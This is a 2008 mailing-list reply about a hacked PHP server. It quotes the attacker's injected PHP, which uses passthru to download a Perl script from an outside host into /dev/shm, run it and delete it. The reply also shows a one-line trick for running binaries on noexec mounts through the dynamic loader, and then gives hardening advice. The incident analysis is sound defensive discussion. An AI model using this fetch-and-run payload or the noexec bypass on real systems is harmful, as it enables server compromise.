On Jan 3, 2008 6:18 PM, Mike Wang <[EMAIL PROTECTED]> wrote: > Hi folks [snip] > http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*'); > passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt > > bb.txt;perl bb.txt;rm -f bb.txt*'); > passthru('id'); > ?> > > the /tmp was mounted as rw,noexec,nosuid, so it cannot run.
nope. See below. > but not the /dev/shm, so the hacked script downloaded to /dev/shm, and run > from there. > > what kind applications are using /dev/shm? I googled around,seem not find > much information. > right now I mount i as rw,noexec,nosuid. A lot of stuff does. /dev/shm is recommended by LSB if I'm not mistaken. I know a few apps who use this (including my own). Well done tracking this script kiddie. This is a very stupid hack. By the way, noexec doesn't buy you anything here. perl bb.txt should've worked no matter if /tmp is exec or not. The way I see it they both worked (/tmp and /dev/shm). And besides, noexec can't even stop executables anyway. That's the stupidest of flags for mount: $> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo foo And don't even think of making /lib/ld-linux.so.2 non exec or something else... Your system will just break in a million pieces ;-) It's time to tell PHP (via php.ini) not to allow any of those functions that allow executing stuff from the system (system, passthru, whatever). Also, you might want to consider using Virtual Servers (Linux VServer, Xen, vmware, etc). Hack me once, shame on you. Hack me any other time with the same stupid attack vector, shame on me. Good that you took time to report this. -- ----)(----- Luis Mondesi Maestro Debiano ----- START ENCRYPTED BLOCK (Triple-ROT13) ------ Gur Hohagh [Yvahk] qvfgevohgvba oevatf gur fcvevg bs Hohagh gb gur fbsgjner jbeyq. ----- END ENCRYPTED BLOCK (Triple-ROT13) ------ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
